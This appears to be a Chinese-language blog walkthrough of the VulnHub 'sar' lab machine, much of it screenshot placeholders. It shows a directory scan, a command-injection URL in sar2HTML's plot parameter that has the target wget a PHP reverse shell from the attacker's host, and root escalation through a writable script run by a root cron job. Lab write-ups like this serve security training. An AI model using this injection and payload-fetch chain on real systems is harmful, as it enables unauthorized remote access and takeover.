Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


vulnhub >_ sar

sar

只有80一个端口

image-20200612221835140

sudo dirsearch -u http://192.168.1.116/ -e php,txt,apsx,asp,html -w /usr/share/wordlists/dirb/big.txt -r

image-20200612221957180

image-20200612222019820

image-20200612222250185

image-20200612222755430

image-20200612222839388

image-20200612223100589

image-20200612223215533

确认wget

image-20200612223600846

制作php rshell

image-20200612223417226

假设本地服务,通过wget下载到目录

http://192.168.1.116/sar2HTML/index.php?plot=;wget http://192.168.1.108:8080/php-reverse-shell.php

image-20200612223932578

image-20200612224134448

使用ls也可以认证上传成功

image-20200612224030807

image-20200612224235766

image-20200612225433054

计划任务中有一个脚本是以root执行的。/var/www/html/finally.sh

image-20200612225349418

image-20200612230156082

不可写,查看一下内容,发现关联的write.sh是可写的。

image-20200612230312349

由于vi回显示不好,直接本地复制文本,目标上vi write.sh dd删除行,然后粘帖进去文本保存

image-20200612233521205

任务5分钟执行一次。监听等待得到root

image-20200612233623038